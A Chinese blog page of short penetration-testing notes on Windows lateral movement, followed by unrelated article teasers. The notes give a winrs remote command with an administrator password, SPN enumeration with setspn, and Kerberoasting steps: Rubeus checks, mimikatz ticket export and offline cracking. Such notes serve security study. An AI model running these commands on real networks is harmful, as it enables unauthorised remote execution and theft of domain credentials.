内网安全-横向移动Kerberos 攻击SPN 扫描WinRMWinRSRDP

embedded/2025/3/21 5:30:52/

1.WinRM&WinRS

条件:

双方开启winrm winrs服务

2008版本以上默认开启,win 7默认关闭

检测使用cs内置端口扫描5985开放情况

进行连接

winrs -r:http://192.168.93.30:5985 -u:administrator -p:Whoami2021 whoami

2.内网-spn

shell setspn -T god.org -q */*

探测主机

rc4可以被逆向aes256不可

3.kerbercast攻击条件:

使用rc4进行加密类型票据,工具Rubeus检测或者看加密类型

1.扫描:

shell setspn -T god.org -q */*

2.使用工具检测

Rubeus kerbercast

3.使用手工进行判断请求

使用klist查看

使用mimkaz进行导出和查看

导出

kerberos::list /export

使用脚本进行破解


http://www.ppmy.cn/embedded/174341.html

相关文章

“消失的中断“

“消失的中断” 1. 前言 在嵌入式开发过程中,中断必不可少。道友们想必也经常因为中断问题头疼不已,今天来说说一个很常见的问题,“消失的中断”。最近项目在使用第三方MCAL的时候,就遇到了I2C中断丢失的问题,排查起…

【sklearn 03】逻辑回归、决策树、支持向量机

逻辑回归、决策树、支持向量机 - 逻辑回归 logistics regression(逻辑回归)算法是经典的分类算法,基本思想是构造一个概率的拟合函数。 决策树 决策树的基本思想是根据样例去推断其背后的树形知识表征 支持向量机 支持向量机SVM(support…

奇瑞汽车智能化战略发布,开启“四大平权”新时代

3月18日,奇瑞汽车智能化战略发布会顺利召开。 据「TMT星球」了解,活动聚焦“油电同智 全球同行”,正式发布奇瑞集团智能化战略规划,并集中展示猎鹰智驾、人形机器人、智舱大模型等最新核心技术成果。 作为中国汽车智能化领域的先…

C#:深入理解Thread.Sleep与Task.Delay

1.核心区别概述 特性Thread.SleepTask.Delay阻塞类型同步阻塞当前线程异步非阻塞,释放线程适用场景同步代码中的简单延时异步编程中的非阻塞等待资源消耗占用线程资源(线程挂起)不占用线程(通过计时器回调)精度依赖操…

51单片机的工作方式

目录 一、51 单片机的时钟电路及时钟信号 (一)时钟电路 (二)时钟信号 二、51 单片机的CPU 时序 (一)时钟周期​ (二)机器周期​ (三)指令周期​ 三、…

Vue 中 this 使用指南与注意事项

文章目录 1. this 的基本概念1.1 Vue 实例中的 this1.2 this 指向问题 2. 常见问题与解决方案2.1 生命周期钩子中的 this2.2 方法中的 this2.3 回调函数中的 this 3. 高级用法与技巧3.1 使用箭头函数3.2 绑定 this3.3 使用闭包 4. 性能优化与调试4.1 性能优化策略4.2 调试技巧 …

面试中JVM常被问到的问题以及对应的答案

在面试中,关于JVM常被问到的问题以及对应的答案可能包括: 什么是JVM?它的作用是什么? 答:JVM是Java虚拟机的缩写,是Java程序运行的环境。它负责将Java源代码编译成字节码并运行在不同平台上。 请解释一下J…

单片机学完开发板,如何继续提升自己的技能?

很多人学完开发板后都会卡在一个尴尬的阶段:觉得自己会的东西不少,但又不知道下一步该干啥。会点C语言,能烧录程序,能点亮LED,玩转按键,搞定串口等等,能用开发板做点小玩意儿,但面对…